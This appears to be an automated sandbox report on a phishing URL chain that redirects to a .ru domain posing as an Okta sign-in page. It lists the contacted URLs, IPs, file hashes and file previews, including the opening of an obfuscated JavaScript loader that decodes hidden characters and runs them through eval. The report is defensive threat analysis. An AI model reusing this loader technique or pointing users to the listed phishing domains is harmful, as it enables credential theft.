                                                      high
                                                      https://s1m0b.aezeib.ru/pani$m01eefalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.google.com/recaptcha/api2/payload?p=06AFcWeA7RJtq4W7dm7kaMTxtn8NggAmAvbiprzXKjhbiJwD7SYiiY-Kx8-EBm1JR2uNfcCNkgFERzEEJv8pgriiLM80zAjRNF9j_F9KSNcovPIyw9e6GToinS0ZtWwJCsh0fjSpFpnFhQ50CKVbTdAIwkqzNxFXSrJ52epVtdHeVnFQpySsb9vvxfe4Ur2NzA-Wla6xdJS62a&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cilfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ed47.eqgegucq.ru/uvd1XeC5IsiSnaDxxuNG8lpJEX5UxzJAf4otlN7vDS2u3CABSGw45XaOkspaLLc8o42Syl59Zef258false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.google.com/recaptcha/api2/replaceimage?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cilfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.google.com/recaptcha/api.jsfalse
                                                        high
                                                        https://essaystoolkit.com/favicon.icofalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://ed47.eqgegucq.ru/GDSherpa-vf2.woff2false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://ed47.eqgegucq.ru/ijCxaVGhkfmp1IvBSHDQBCoAux104p5ScooPmnQKESTK6WeHwBmmNvbUyuaqef205false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.google.com/recaptcha/api2/clr?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cilfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://essaystoolkit.com/sector/#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POrfalse
                                                          unknown
                                                          https://ed47.eqgegucq.ru/mn4L6GOLUlZagYCbsT3n6wqLN3uvB4LSfOCpkdoB6H90150false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.google.com/recaptcha/api2/userverify?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cilfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                            high
                                                            https://ed47.eqgegucq.ru/yzdQtVS4GZ6E51fEe1WiaTcO2T94coK4b5rsvJmFyXkpoAHmVSFi3h9nbLL1XtW90179false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.google.com/recaptcha/api2/payload?p=06AFcWeA7RJtq4W7dm7kaMTxtn8NggAmAvbiprzXKjhbiJwD7SYiiY-Kx8-EBm1JR2uNfcCNkgFERzEEJv8pgriiLM80zAjRNF9j_F9KSNcovPIyw9e6GToinS0ZtWwJCsh0fjSpFpnFhQ50CKVbTdAIwkqzNxFXSrJ52epVtdHeVnFQpySsb9vvxfe4Ur2NzA-Wla6xdJS62a&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil&id=2false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.cssfalse
                                                              high
                                                              https://ed47.eqgegucq.ru/sjumucqabfclbjefnqpybtzwerNKIJNN9C3R9ZXF1N9MW87E?CEVAWWSWUUDPEWQHIVQDZKKHUtrue
                                                                unknown
                                                                https://www.google.com/recaptcha/api2/anchor?ar=1&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil&co=aHR0cHM6Ly9lc3NheXN0b29sa2l0LmNvbTo0NDM.&hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI&size=normal&cb=2rirk35zck5ifalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://www.google.com/recaptcha/api2/webworker.js?hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeIfalse
                                                                  high
                                                                  https://ed47.eqgegucq.ru/565DjQ1Ra2l4xoaZFArRnnwo5VzkldbbbqJ2d11vApKI67108false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ed47.eqgegucq.ru/wxkWLQweY9Qg0L5nCd2X623j9opsekGix38GhVF7Lj34130false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://essaystoolkit.com/sectorfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ed47.eqgegucq.ru/xyu8eLPpqmTcd30false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ed47.eqgegucq.ru/GDSherpa-regular.woff2false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://a.nel.cloudflare.com/report/v4?s=5L4RBB7WM5XxbOSAYG%2FHSK7HxE64Fmzky9DQCXaOTMII2bcBVjDebfjadbnEw6zWjvJpZfyLI8rmCdbvdakNNA2IVbrKiMM9%2BabL2MI589aIeMGT%2F7fPgl3zuIu1false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ed47.eqgegucq.ru/ijxbIFM35ef0YB7ynrIMZkoZM73so5LWwiopAFQMb2gqvNqDiWbmViQTZH9xYRvr6Uh1Y3ab230false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ed47.eqgegucq.ru/klYU2PKXiTJDrNtGHGVk9e7Tkij8GMA4mghRT2jIQVkqXsQEH35qpnwx219false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ed47.eqgegucq.ru/favicon.icofalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ed47.eqgegucq.ru/zcpJU9RLzEotRfw1OKHO7Ow0ulS8Eg1wjEd1tPuSmTOegyfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ed47.eqgegucq.ru/34mdHVcd0wRK58920false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ed47.eqgegucq.ru/yc2BMfvrjsNeHhhExdlRWW6PfXjd9Ovl4false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.google.com/recaptcha/api2/reload?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cilfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ed47.eqgegucq.ru/rsTLp2CToreFE8klRPbyfp7Weuvkad8OQ49Wh538NV5jvMGQcd199false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ed47.eqgegucq.ru/ophWiuhE9GhMo1Iuc1EtOZmJk6WgA6klGn5stqM5NxIPbKQjpaJ8Kuvc7difuAmcd233false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://a.nel.cloudflare.com/report/v4?s=1fnEOnyasn%2FasDyloS90M%2Fs4eFZjmAplsRZPXkVGWuJmCLFITiDr1zRJhvGu6Urdz0QIeTrFeWBDLfXZk3Ch87vwETjK3ZHUjm10G6XwvHKW%2FCCS75xEut0ZELHJfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ed47.eqgegucq.ru/GDSherpa-vf.woff2false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  142.250.80.46
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  140.82.113.4
                                                                  github.comUnited States
                                                                  36459GITHUBUSfalse
                                                                  104.21.47.176
                                                                  ed47.eqgegucq.ruUnited States
                                                                  13335CLOUDFLARENETUStrue
                                                                  104.21.53.220
                                                                  unknownUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  172.253.63.84
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.251.40.227
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.251.40.206
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.64.74
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.80.3
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  172.67.219.43
                                                                  s1m0b.aezeib.ruUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  185.199.109.133
                                                                  objects.githubusercontent.comNetherlands
                                                                  54113FASTLYUSfalse
                                                                  172.217.165.132
                                                                  www.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  18.164.124.11
                                                                  d19d360lklgih4.cloudfront.netUnited States
                                                                  3MIT-GATEWAYSUSfalse
                                                                  35.190.80.1
                                                                  a.nel.cloudflare.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.251.35.174
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.80.106
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  104.17.24.14
                                                                  cdnjs.cloudflare.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  142.250.65.196
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  162.0.235.11
                                                                  essaystoolkit.comCanada
                                                                  22612NAMECHEAP-NETUSfalse
                                                                  142.250.64.100
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.81.228
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.80.99
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.81.227
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  151.101.2.137
                                                                  code.jquery.comUnited States
                                                                  54113FASTLYUSfalse
                                                                  142.251.41.3
                                                                  unknownUnited States
                                                                  15169GOOGLEUSfalse
                                                                  IP
                                                                  192.168.2.16
                                                                  192.168.2.23
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1648740
                                                                  Start date and time:2025-03-26 06:57:24 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                  Sample URL:https://www.google.com/url?q=https%3A%2F%2Fessaystoolkit.com%2Fsector&sa=D&sntz=1&usg=AOvVaw3ATSMSB0528phcgCi4pOKj&af6pbi8nqbgwu55cw518lklmc8rlvoy3529l3qOWAXRM0I9djvzki8kdrm19expwx==gXGKj7fHmzWdkj2fwKEGO6dPY7Z5PPVc3m4uU~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POr
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:16
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • EGA enabled
                                                                  Analysis Mode:stream
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.phis.evad.win@25/48@66/231
                                                                  • Exclude process from analysis (whitelisted): svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 142.251.35.174, 142.250.81.227, 142.250.80.46, 172.253.63.84, 142.250.64.110, 142.250.80.110, 142.251.32.110, 142.250.80.3, 142.250.80.106
                                                                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: https://www.google.com/url?q=https%3A%2F%2Fessaystoolkit.com%2Fsector&amp;sa=D&amp;sntz=1&amp;usg=AOvVaw3ATSMSB0528phcgCi4pOKj&amp;af6pbi8nqbgwu55cw518lklmc8rlvoy3529l3qOWAXRM0I9djvzki8kdrm19expwx==gXGKj7fHmzWdkj2fwKEGO6dPY7Z5PPVc3m4uU~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LXGhAFK67Ngt8OgVyICJaqw7ha7==afV0FL0LY5RCvaMaS680fdF7POr
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):352
                                                                  Entropy (8bit):5.175232121282675
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:86159CD7E6C00175A155D27EB3FD9C30
                                                                  SHA1:DD458938CB18167753182EA3C8F93092535FAF78
                                                                  SHA-256:BFD9D5F42951EB09ABC224CD128EB8AD738025BEDEAA3A0D5485BBE8E3C2CC52
                                                                  SHA-512:A71F9D99FAE01A3A30CCAD4EE4C0C6D133EEFB9D1F6D042F69782AE50076D455D2A51E3ABC7B9BD6E5DEF7B6620A55780B5E8925236B719DCD9E9B727EBD47AF
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://www.google.com/url?q=https%3A%2F%2Fessaystoolkit.com%2Fsector&sa=D&sntz=1&usg=AOvVaw3ATSMSB0528phcgCi4pOKj&af6pbi8nqbgwu55cw518lklmc8rlvoy3529l3qOWAXRM0I9djvzki8kdrm19expwx==gXGKj7fHmzWdkj2fwKEGO6dPY7Z5PPVc3m4uU~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c
                                                                  Preview:<HTML><HEAD>.<meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>Redirecting</TITLE>.<META HTTP-EQUIV="refresh" content="1; url=https://essaystoolkit.com/sector">.</HEAD>.<BODY onLoad="location.replace('https://essaystoolkit.com/sector'+document.location.hash)">.Redirecting you to https://essaystoolkit.com/sector</BODY></HTML>..
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:dropped
                                                                  Size (bytes):270
                                                                  Entropy (8bit):4.840496990713235
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:40EB39126300B56BF66C20EE75B54093
                                                                  SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                  SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                  SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:0
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 3
                                                                  Category:downloaded
                                                                  Size (bytes):48980
                                                                  Entropy (8bit):7.974873519852354
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:15B38ED97A0AC5766BB1FE8890A71FDD
                                                                  SHA1:64A1E91EF19840878BB25DC0A095D147AE8AA0F1
                                                                  SHA-256:BA4DC71490036E90FE36FE0080823D59E806C416F294DD7B1E52390C5CA54736
                                                                  SHA-512:A1E538B24C5B185A9300B1DFA627931948CD198BD3676DDAD542B2E2E861DAC8609D7285C9684DA13D776C2D33050926233E4583F37E112EDC77A1BC56C746C8
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://www.google.com/recaptcha/api2/payload?p=06AFcWeA5f9HoPutYyBT2qwEzJOsT6nG8YNTH3FZDW5KtKfrt7YciDGcNlchkbD0_x8edYD-TcJd2wYLmh26nPsdqIRSCUUdq9JHHfbd68pFcR4xnRXC4q9ZJTxEF4wZy_Oz5Ga8FjwRu0iVk7vIeH8bkkLeQ8mRemJu5S9MIXNu1kc-PqZ79aRRIMGVUXtvyrdHSEwliq6Kl-&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil
                                                                  Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................,.,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..........Z..7.ye.]\A&..$H...A........vV...qa.m...m....Da.VS....<....2WV>......|.a.k.F...^.ip$-l.;f...s....,...%.x.K.ws.....|Qb.l..m...5.`....O.d.w......w.....O.k..|A.k.........imD0M..ek*..yF$P27.r...v..9k...z?...%t.[DV ........1.c+..B...........c.q4k]5..7ww.n........Z..O.Mz.^K.K.T..X..3=..".**..............i..........Vx.+.......i.|..#1..6.\..'..i.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                  Category:downloaded
                                                                  Size (bytes):35970
                                                                  Entropy (8bit):7.989503040923577
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                  SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                  SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                  SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/GDSherpa-bold.woff
                                                                  Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):16
                                                                  Entropy (8bit):3.5
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                                  SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                                  SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                                  SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCSbbwcRSeOlcEgUNNzCpMCG5jCUlxvHZ3Q==?alt=proto
                                                                  Preview:CgkKBw03MKkwGgA=
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):665
                                                                  Entropy (8bit):7.42832670119013
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:07BF314AAB04047B9E9A959EE6F63DA3
                                                                  SHA1:17BEF6602672E2FD9956381E01356245144003E5
                                                                  SHA-256:55EAF62CB05DA20088DC12B39D7D254D046CB1FD61DDF3AE641F1439EFD0A5EE
                                                                  SHA-512:2A1D4EBC7FBA6951881FD1DDA745480B504E14E3ADAC3B27EC5CF4045DE14FF030D45DDA99DC056285C7980446BA0FC37F489B7534BE46107B21BD43CEE87BA0
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..W..DA.=.6O...H.,E.............b.....C.1...1..EbLPI.W......H..s.z5.:..._.d.0.u.......j.x.R..._.v..R...1..ir..`.yn..R..j.h./y..l......(`..5....l.E..0......B^......F.....F....Y|p..._,p.............(3^.r.P.O......;<....z.,..yF....N..x.MS...Q.C%......D8G.+......oOk...)T..}|..e...G.....'.R..G.Z.T}7(...&..@...G....$PGYv...A.c.]d....N..'.4b...R.%..)2Yd..b.M..^@.M....^.:h.N(dP*t..RQ%.o...{.vGH..S._".@./...g.....]...?..h..E.,r.m.%."."W.6G..t...->....q\.Kc.t"^......Kj~{l..C..).y..><@|yB....=c.............!...<....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):128
                                                                  Entropy (8bit):4.750616928608237
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:D90F02F133E7B82AF89B3E58526AC459
                                                                  SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                                  SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                                  SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCQ6nNgqrrmxfEgUNX1f-DRIFDRObJGMhdt8628nzuR4SSgl1gbX7RjpZnxIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0IXeHKxgt8GGV?alt=proto
                                                                  Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):4724541
                                                                  Entropy (8bit):2.5839796656457863
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:AA849F9614E090F7E5EBED754F83D3C2
                                                                  SHA1:4100808BBC0665E1ECF3372DDF7DD02A14B1387A
                                                                  SHA-256:928A123423281E31FCC018F4CB5B297299EFB723678D2A45EFCD842F6C6A4AE6
                                                                  SHA-512:522EB407E209EA8E61622882669258866409277A8E754A994264D4B1418164236AAFB4630FA8B3A0029D7D0700E07D1113CFED04882BEAF3842C8FB5CE167E8D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/565DjQ1Ra2l4xoaZFArRnnwo5VzkldbbbqJ2d11vApKI67108
                                                                  Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):2228
                                                                  Entropy (8bit):7.82817506159911
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                  SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                  SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                  SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (23665), with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):28692
                                                                  Entropy (8bit):5.953854777960378
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:2C6D6E023BD822FC656497568D7E6BF0
                                                                  SHA1:BCB5DBE36CBEE90F079C91A1DCF6E634DAEFAEAC
                                                                  SHA-256:0E8E73DB61EDE3016A05578BED9DBA81A2EBF72E303B2E15E041DDFAD76249C4
                                                                  SHA-512:685260DF9EBBBCC6F41E579895755120142A19C7CB02E0CBE6A49FD5B442517ED1C1A2446F5DA53AD68CD28D41721DEB5FF23808A280C58DEB134652EB343821
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://ed47.eqgegucq.ru/SaqM/
